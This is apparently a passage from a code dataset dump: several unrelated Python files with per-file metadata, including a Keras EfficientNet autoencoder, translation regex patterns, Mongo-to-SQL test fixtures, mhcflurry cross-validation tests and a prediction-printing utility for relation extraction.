inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
# # # decoder Stage 1
# X = Concatenate()([X, skip_5])
# X, _ = self.identity_block_transpose(
# X, 3, [2048, 2048, 2048], stage=6, block='b')
X, _ = self.identity_block_transpose(
X, 3, [1280, 1280, 1280], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_4])
X = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("4---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_3])
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("3---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [256, 256, 256], stage=8, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[128, 64, 64], stage=8, block='a', s=2)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
print("pre_5---- ",prediction.shape)
pre_5 = prediction
# # # decoder Stage 4
X = Concatenate()([X, skip_2])
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("2---- ",X.shape)
X = Conv2DTranspose(128, (1, 1), strides=(
1, 1), name='conv9-1', padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(64, (3, 3), strides=(2, 2), name='conv9-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-2')(X)
X = Activation('relu')(X)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
print("pre_6---- ",prediction.shape)
pre_6 = prediction
# # decoder Stage 5
X = Concatenate()([X, skip_1])
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("1---- ",X.shape)
X = Conv2DTranspose(64, (1, 1), strides=(
1, 1), name='conv10-1', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(32, (1, 1), strides=(
1, 1), name='conv10-2', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-2')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(16, (1, 1), strides=(
1, 1), name='conv10-3', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-3')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(2, 2), padding="same")(X)
outputs = Activation('sigmoid')(X)
print('final----', outputs.shape)
new_model = Model(inputs=model.inputs, outputs= [pre_5, pre_6 , outputs], name='ResNet_block_autoencoder')
# print(autoencoder.summary())
return new_model
def ours_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# print('E1-------', skip_1.shape)
# print('E2-------', skip_2.shape)
# print('E3-------', skip_3.shape)
# print('E4-------', skip_4.shape)
# print("5---- ",X.shape)
# use efficientnet as encoder
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
# # # decoder Stage 1
# X = Concatenate()([X, skip_5])
# X, _ = self.identity_block_transpose(
# X, 3, [2048, 2048, 2048], stage=6, block='b')
X, _ = self.identity_block_transpose(
X, 3, [1280, 1280, 1280], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_4])
X = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("4---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_3])
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("3---- ",X.shape)
X = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(X)
X = BatchNormalization(axis=-1)(X)
X = Activation('relu')(X)
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
X = Activation('relu')(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
prediction = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(prediction)
print("pre_5---- ",prediction.shape)
pre_5 = prediction
# # # decoder Stage 4
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
X = Concatenate()([X, skip_2])
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("2---- ",X.shape)
X = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(X)
X = BatchNormalization(axis=-1)(X)
X = Activation('relu')(X)
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
X = Activation('relu')(X)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
prediction = Activation('sigmoid')(prediction)
prediction = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(prediction)
print("pre_6---- ",prediction.shape)
pre_6 = prediction
# # decoder Stage 5
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
X = Concatenate()([X, skip_1])
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("1---- ",X.shape)
X = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(X)
X = BatchNormalization(axis=-1)(X)
X = Activation('relu')(X)
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(1, 1), padding="same")(X)
outputs = Activation('sigmoid')(X)
print('final----', outputs.shape)
new_model = Model(inputs=model.inputs, outputs= [pre_5, pre_6 , outputs], name='ResNet_block_autoencoder')
# print(autoencoder.summary())
return new_model
def Efficient_autoencoder(self, height, width, depth):
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
# X = model(inputs, training=True)
for i in range (len(model.layers)):
print(i,'-----', model.layers[i].name,'----', model.layers[i].output.shape )
model.summary()
return model
| 45.331839 | 163 | 0.585854 | 6,825 | 50,545 | 4.183736 | 0.037802 | 0.009456 | 0.031519 | 0.048189 | 0.917069 | 0.895321 | 0.877881 | 0.864677 | 0.855432 | 0.848603 | 0 | 0.082324 | 0.248749 | 50,545 | 1,114 | 164 | 45.372531 | 0.669651 | 0.143951 | 0 | 0.774709 | 0 | 0 | 0.052415 | 0.002746 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018895 | false | 0 | 0.037791 | 0 | 0.077035 | 0.077035 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
999ec80d867686407df48731589b64c41e0d8a9f | 1,680 | py | Python | config/regex_patterns.py | project-anuvaad/OpenNMT-py | 267d097b9e90d59709fe1c26ea8b8e2c43c755c9 | [
"MIT"
] | null | null | null | config/regex_patterns.py | project-anuvaad/OpenNMT-py | 267d097b9e90d59709fe1c26ea8b8e2c43c755c9 | [
"MIT"
] | 29 | 2019-07-18T10:21:57.000Z | 2019-10-24T11:41:59.000Z | config/regex_patterns.py | project-anuvaad/OpenNMT-py | 267d097b9e90d59709fe1c26ea8b8e2c43c755c9 | [
"MIT"
] | null | null | null | '''
Various regex patterns used to support translation
'''
patterns = {
"p1" : { "regex":r'(\d+,)\s(\d+)', "description":"remove space between number separated by ," },
"p2" : { "regex":r'(\d+.)\s(\d+)', "description":"remove space between number separated by ." },
"p3" : { "regex":r'\d+', "description":"indentify numbers in a string" },
"p4" : { "regex":r'(NnUuMm.,)\s(NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ," },
"p5" : { "regex":r'(NnUuMm..)\s(NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ." },
"p6" : { "regex":r'(NnUuMm.,)\s(0NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ," },
"p7" : { "regex":r'(NnUuMm..)\s(0NnUuMm+)', "replacement":r'\1\2',"description":"remove space between number separated by ." },
"p8" : { "regex":r'(NnUuMm..)\s(NnUuMm..)\s(NnUuMm+)', "replacement":r'\1\2\3',"description":"remove space between 3 number separated by ," },
"p9" : { "regex":r'(NnUuMm.,)\s(NnUuMm.,)\s(NnUuMm+)', "replacement":r'\1\2\3',"description":"remove space between 3 number separated by ." },
"p10": { "regex":r'^(\(|\[|\{)(\d+|\d+.|\d+.\d+)(\)|\]|\})$', "description":"regex for handling different types of number prefix ie in first token only,brackets variations"},
"p11": { "regex":r'^(\d+|\d+.|\d+.\d+)$', "description":"regex for handling different types of number prefix ie in first token only, no brackets variations"}
}
hindi_numbers = ['०','१','२','३','४','५','६','७','८','९','१०','११','१२','१३','१४','१५','१६','१७','१८','१९','२०','२१','२२','२३','२४','२५','२६','२७','२८','२९','३०']
| 84 | 178 | 0.590476 | 234 | 1,680 | 4.235043 | 0.358974 | 0.066599 | 0.177598 | 0.234107 | 0.776993 | 0.776993 | 0.776993 | 0.776993 | 0.776993 | 0.776993 | 0 | 0.056309 | 0.122619 | 1,680 | 19 | 179 | 88.421053 | 0.616011 | 0.029762 | 0 | 0 | 0 | 0 | 0.707768 | 0.118372 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
51111db4680077de4c1c2daa5967ca5a287549a4 | 8,298 | py | Python | mongo-to-sql/mongo_to_sql_tests/constants/postgres.py | wgarlock/mongo-to-sql | b421d48b822c9d8443f76492230987886de34a9d | [
"MIT"
] | null | null | null | mongo-to-sql/mongo_to_sql_tests/constants/postgres.py | wgarlock/mongo-to-sql | b421d48b822c9d8443f76492230987886de34a9d | [
"MIT"
] | 1 | 2021-01-24T21:07:52.000Z | 2021-01-24T21:07:52.000Z | mongo-to-sql/mongo_to_sql_tests/constants/postgres.py | wgarlock/mongo-to-sql | b421d48b822c9d8443f76492230987886de34a9d | [
"MIT"
] | null | null | null | from lorem_text import lorem
postgres_database_name = "postgres_test"
postgres_database_name_no_exist = "postgres_test_i_dont_exist"
clean_table_name = "test_table"
column_mapper_key_id = "_id"
column_mapper_key_var_length_string = "city"
column_mapper_key_int = "pop"
column_mapper_key_fixed_len_string = "state"
column_mapper_key_list = "loc"
column_mapper_key_large_text = "large_text"
column_mapper_key_bool = "is_big"
column_mapper_key_float = "area",
column_mapper_key_tuple = "leaders"
column_mapper_key_dict = "city_hall"
column_mapper_values = [
{
column_mapper_key_id: "01002",
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 1352374687.06598,
column_mapper_key_tuple: ("wefwef", "wefwef", "wefwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01003",
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36934,
column_mapper_key_fixed_len_string: "OH",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 135747856786687.55506598,
column_mapper_key_tuple: ("wefwwefef", "wefweweff", "wefwef", "kjqwdihqwd"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01004",
column_mapper_key_var_length_string: "SHMAN",
column_mapper_key_int: 36965,
column_mapper_key_fixed_len_string: "FL",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 13785687.06555598,
column_mapper_key_tuple: ("wefuiluilwef", "weweffwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01005",
column_mapper_key_var_length_string: "MAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "GA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 13574756.98,
column_mapper_key_tuple: ("wefuiluilwef", "wefwuiluilf", "weuiluilfwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01006",
column_mapper_key_var_length_string: "CUSH",
column_mapper_key_int: 36763,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-74.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 654687.06598,
column_mapper_key_tuple: ("wwwhhrtwef", "wefwghgergeref", "wefgggjjtyjwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
]
inconsistent_column_mapper_values = [
{
column_mapper_key_id: 1002,
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 1352374687.06598,
column_mapper_key_tuple: ("wefwef", "wefwef", "wefwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01003",
column_mapper_key_var_length_string: "CUSHMAN",
column_mapper_key_int: 36934,
column_mapper_key_fixed_len_string: "OH",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 135747856786687.55506598,
column_mapper_key_tuple: ("wefwwefef", "wefweweff", "wefwef", "kjqwdihqwd"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: 1004,
column_mapper_key_var_length_string: "SHMAN",
column_mapper_key_fixed_len_string: "FL",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: True,
column_mapper_key_float: 13785687.06555598,
column_mapper_key_tuple: ("wefuiluilwef", "weweffwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01005",
column_mapper_key_var_length_string: "MAN",
column_mapper_key_int: 36963,
column_mapper_key_fixed_len_string: "GA",
column_mapper_key_list: [
-72.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: "True",
column_mapper_key_float: 13574756.98,
column_mapper_key_tuple: ("wefuiluilwef", "wefwuiluilf", "weuiluilfwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
{
column_mapper_key_id: "01006",
column_mapper_key_var_length_string: "CUSH",
column_mapper_key_int: 36763,
column_mapper_key_fixed_len_string: "MA",
column_mapper_key_list: [
-74.51565, 42.377017
],
column_mapper_key_large_text: lorem.words(255),
column_mapper_key_bool: False,
column_mapper_key_float: 654687.06598,
column_mapper_key_tuple: ("wwwhhrtwef", "wefwghgergeref", "wefgggjjtyjwef"),
column_mapper_key_dict: {
"name": "home",
"stories": 3
}
},
]
unique_list_with_id = ["_id"]
column_mapper_values_dict = {
column_mapper_key_id: ["01002", "01003", "01004", "01005", "01006"],
column_mapper_key_var_length_string: ["CUSHMAN", "CUSHMAN", "SHMAN", "MAN", "CUSH"],
column_mapper_key_int: [36963, 36934, 36965, 36963, 36763],
column_mapper_key_fixed_len_string: ["MA", "OH", "FL", "GS", "MA"],
column_mapper_key_list: [
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
[
-72.51565, 42.377017
],
],
column_mapper_key_large_text: [
lorem.words(255),
lorem.words(255),
lorem.words(255),
lorem.words(255),
lorem.words(255)
],
column_mapper_key_bool: [True, False, True, True, False],
column_mapper_key_float: [1352374687.06598, 135747856786687.55506598, 13785687.06555598, 13574756.98, 654687.06598],
column_mapper_key_tuple: [
("wefwef", "wefwef", "wefwef"),
("wefwwefef", "wefweweff", "wefwef", "kjqwdihqwd"),
("wefuiluilwef", "weweffwef"),
("wefuiluilwef", "wefwuiluilf", "weuiluilfwef"),
("wwwhhrtwef", "wefwghgergeref", "wefgggjjtyjwef"),
],
column_mapper_key_dict: [
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
{
"name": "home",
"stories": 3
},
]
}
string_format_constants = [
"_test_id",
"test_id_",
"test__id"
]
| 31.313208 | 120 | 0.598096 | 913 | 8,298 | 4.936473 | 0.106243 | 0.324828 | 0.396051 | 0.053251 | 0.861327 | 0.842911 | 0.820723 | 0.795873 | 0.773242 | 0.768582 | 0 | 0.111036 | 0.291275 | 8,298 | 264 | 121 | 31.431818 | 0.655331 | 0 | 0 | 0.633858 | 0 | 0 | 0.116896 | 0.003133 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.003937 | 0 | 0.003937 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cf95333b81c993ef0282af397abd85658f737d8b | 3,224 | py | Python | test/test_cross_validation.py | juvejones/mhcflurry_pan | 08b6fd3116230f954db37a1917e70107f1ffe9d9 | [
"Apache-2.0"
] | 1 | 2020-08-06T06:53:46.000Z | 2020-08-06T06:53:46.000Z | test/test_cross_validation.py | juvejones/mhcflurry_pan | 08b6fd3116230f954db37a1917e70107f1ffe9d9 | [
"Apache-2.0"
] | null | null | null | test/test_cross_validation.py | juvejones/mhcflurry_pan | 08b6fd3116230f954db37a1917e70107f1ffe9d9 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from nose.tools import eq_
import mhcflurry
import fancyimpute
from mhcflurry.downloads import get_path
from mhcflurry.class1_allele_specific import (
cross_validation_folds,
train_across_models_and_folds)
from mhcflurry.class1_allele_specific.train import (
HYPERPARAMETER_DEFAULTS)
def test_imputation():
imputer = fancyimpute.MICE(
n_imputations=2, n_burn_in=1, n_nearest_columns=25)
train_data = (
mhcflurry.dataset.Dataset.from_csv(
get_path("data_kim2014", "bdata.2009.mhci.public.1.txt"))
.get_alleles(["HLA-A0201", "HLA-A0202", "HLA-A0301"]))
folds = cross_validation_folds(
train_data,
n_folds=3,
imputer=imputer,
drop_similar_peptides=True,
alleles=["HLA-A0201", "HLA-A0202"])
eq_(set(x.allele for x in folds), {"HLA-A0201", "HLA-A0202"})
eq_(len(folds), 6)
for fold in folds:
eq_(fold.train.unique_alleles(), set([fold.allele]))
eq_(fold.imputed_train.unique_alleles(), set([fold.allele]))
eq_(fold.test.unique_alleles(), set([fold.allele]))
def test_cross_validation_no_imputation():
train_data = (
mhcflurry.dataset.Dataset.from_csv(
get_path("data_kim2014", "bdata.2009.mhci.public.1.txt"))
.get_alleles(["HLA-A0201", "HLA-A0202", "HLA-A0301"]))
folds = cross_validation_folds(
train_data,
n_folds=3,
imputer=None,
drop_similar_peptides=True,
alleles=["HLA-A0201", "HLA-A0202"]
)
eq_(set(x.allele for x in folds), {"HLA-A0201", "HLA-A0202"})
eq_(len(folds), 6)
for fold in folds:
eq_(fold.train.unique_alleles(), set([fold.allele]))
eq_(fold.test.unique_alleles(), set([fold.allele]))
models = HYPERPARAMETER_DEFAULTS.models_grid(
activation=["tanh", "relu"],
layer_sizes=[[4]],
embedding_output_dim=[8],
n_training_epochs=[3])
print(models)
df = train_across_models_and_folds(folds, models)
print(df)
assert df.test_auc.mean() > 0.6
def test_cross_validation_with_imputation():
imputer = fancyimpute.MICE(
n_imputations=2, n_burn_in=1, n_nearest_columns=25)
train_data = (
mhcflurry.dataset.Dataset.from_csv(
get_path("data_kim2014" , "bdata.2009.mhci.public.1.txt"))
.get_alleles(["HLA-A0201", "HLA-A0202", "HLA-A0301"]))
folds = cross_validation_folds(
train_data,
n_folds=3,
imputer=imputer,
drop_similar_peptides=True,
alleles=["HLA-A0201", "HLA-A0202"])
eq_(set(x.allele for x in folds), {"HLA-A0201", "HLA-A0202"})
eq_(len(folds), 6)
for fold in folds:
eq_(fold.train.unique_alleles(), set([fold.allele]))
eq_(fold.imputed_train.unique_alleles(), set([fold.allele]))
eq_(fold.test.unique_alleles(), set([fold.allele]))
models = HYPERPARAMETER_DEFAULTS.models_grid(
activation=["tanh", "relu"],
layer_sizes=[[4]],
embedding_output_dim=[8],
n_training_epochs=[3])
print(models)
df = train_across_models_and_folds(folds, models)
print(df)
assert df.test_auc.mean() > 0.6
| 29.851852 | 70 | 0.648883 | 423 | 3,224 | 4.666667 | 0.205674 | 0.036474 | 0.050152 | 0.072948 | 0.874367 | 0.828267 | 0.828267 | 0.828267 | 0.828267 | 0.828267 | 0 | 0.054022 | 0.2134 | 3,224 | 107 | 71 | 30.130841 | 0.724369 | 0 | 0 | 0.807229 | 0 | 0 | 0.100806 | 0.026055 | 0 | 0 | 0 | 0 | 0.024096 | 1 | 0.036145 | false | 0 | 0.084337 | 0 | 0.120482 | 0.048193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cfb1efc4639bcfdbb626da68cafa400cf58f9585 | 64 | py | Python | codes/models/utils/__init__.py | ZichengDuan/MVM3D | 5242fa05afb6bff097908c88a8ef0fd9bc4a1fc5 | [
"MIT"
] | 21 | 2021-09-14T19:11:29.000Z | 2022-02-05T05:58:32.000Z | codes/models/utils/__init__.py | Robert-Mar/MVM3D | b62c96de5894ae5fef615e2ee54fe975248a3df7 | [
"MIT"
] | 1 | 2021-11-25T08:56:32.000Z | 2021-12-04T07:40:23.000Z | codes/models/utils/__init__.py | Robert-Mar/MVM3D | b62c96de5894ae5fef615e2ee54fe975248a3df7 | [
"MIT"
] | 2 | 2021-09-13T04:07:10.000Z | 2021-09-14T09:15:52.000Z | from .nms.non_maximum_suppression import non_maximum_suppression | 64 | 64 | 0.921875 | 9 | 64 | 6.111111 | 0.666667 | 0.363636 | 0.763636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046875 | 64 | 1 | 64 | 64 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7a3ecb5fa38e871cbb1215e8dabbec4c00097064 | 8,628 | py | Python | utils/prediction_outputs.py | liu4lin/UniRE | fb31801161758e50762f9a70820b71aefb5c5515 | [
"MIT"
] | 87 | 2021-07-12T02:35:50.000Z | 2022-03-31T12:44:49.000Z | utils/prediction_outputs.py | liu4lin/UniRE | fb31801161758e50762f9a70820b71aefb5c5515 | [
"MIT"
] | 10 | 2021-07-29T01:35:50.000Z | 2022-03-03T04:05:42.000Z | utils/prediction_outputs.py | liu4lin/UniRE | fb31801161758e50762f9a70820b71aefb5c5515 | [
"MIT"
] | 12 | 2021-07-18T09:06:07.000Z | 2022-03-31T12:44:51.000Z | def print_predictions(outputs, file_path, vocab, sequence_label_domain=None):
"""print_predictions prints prediction results
Args:
outputs (list): prediction outputs
file_path (str): output file path
vocab (Vocabulary): vocabulary
sequence_label_domain (str, optional): sequence label domain. Defaults to None.
"""
with open(file_path, 'w') as fout:
for sent_output in outputs:
seq_len = sent_output['seq_len']
assert 'tokens' in sent_output
tokens = [vocab.get_token_from_index(token, 'tokens') for token in sent_output['tokens'][:seq_len]]
print("Token\t{}".format(' '.join(tokens)), file=fout)
if 'text' in sent_output:
print(f"Text\t{sent_output['text']}", file=fout)
if 'sequence_labels' in sent_output and 'sequence_label_preds' in sent_output:
sequence_labels = [
vocab.get_token_from_index(true_sequence_label, sequence_label_domain)
for true_sequence_label in sent_output['sequence_labels'][:seq_len]
]
sequence_label_preds = [
vocab.get_token_from_index(pred_sequence_label, sequence_label_domain)
for pred_sequence_label in sent_output['sequence_label_preds'][:seq_len]
]
print("Sequence-Label-True\t{}".format(' '.join(sequence_labels)), file=fout)
print("Sequence-Label-Pred\t{}".format(' '.join(sequence_label_preds)), file=fout)
if 'joint_label_matrix' in sent_output:
for row in sent_output['joint_label_matrix'][:seq_len]:
print("Joint-Label-True\t{}".format(' '.join(
[vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
file=fout)
if 'joint_label_preds' in sent_output:
for row in sent_output['joint_label_preds'][:seq_len]:
print("Joint-Label-Pred\t{}".format(' '.join(
[vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
file=fout)
if 'separate_positions' in sent_output:
print("Separate-Position-True\t{}".format(' '.join(map(str, sent_output['separate_positions']))),
file=fout)
if 'all_separate_position_preds' in sent_output:
print("Separate-Position-Pred\t{}".format(' '.join(map(str,
sent_output['all_separate_position_preds']))),
file=fout)
if 'span2ent' in sent_output:
for span, ent in sent_output['span2ent'].items():
ent = vocab.get_token_from_index(ent, 'span2ent')
assert ent != 'None', "true relation can not be `None`."
print("Ent-True\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
if 'all_ent_preds' in sent_output:
for span, ent in sent_output['all_ent_preds'].items():
# ent = vocab.get_token_from_index(ent, 'span2ent')
print("Ent-Span-Pred\t{}".format(span), file=fout)
print("Ent-Pred\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
if 'span2rel' in sent_output:
for (span1, span2), rel in sent_output['span2rel'].items():
rel = vocab.get_token_from_index(rel, 'span2rel')
assert rel != 'None', "true relation can not be `None`."
if rel[-1] == '<':
span1, span2 = span2, span1
print("Rel-True\t{}\t{}\t{}\t{}\t{}".format(rel[:-2], span1, span2,
' '.join(tokens[span1[0]:span1[1]]),
' '.join(tokens[span2[0]:span2[1]])),
file=fout)
if 'all_rel_preds' in sent_output:
for (span1, span2), rel in sent_output['all_rel_preds'].items():
# rel = vocab.get_token_from_index(rel, 'span2rel')
if rel[-1] == '<':
span1, span2 = span2, span1
print("Rel-Pred\t{}\t{}\t{}\t{}\t{}".format(rel[:-2], span1, span2,
' '.join(tokens[span1[0]:span1[1]]),
' '.join(tokens[span2[0]:span2[1]])),
file=fout)
print(file=fout)
def print_predictions_for_joint_decoding(outputs, file_path, vocab):
"""print_predictions prints prediction results
Args:
outputs (list): prediction outputs
file_path (str): output file path
vocab (Vocabulary): vocabulary
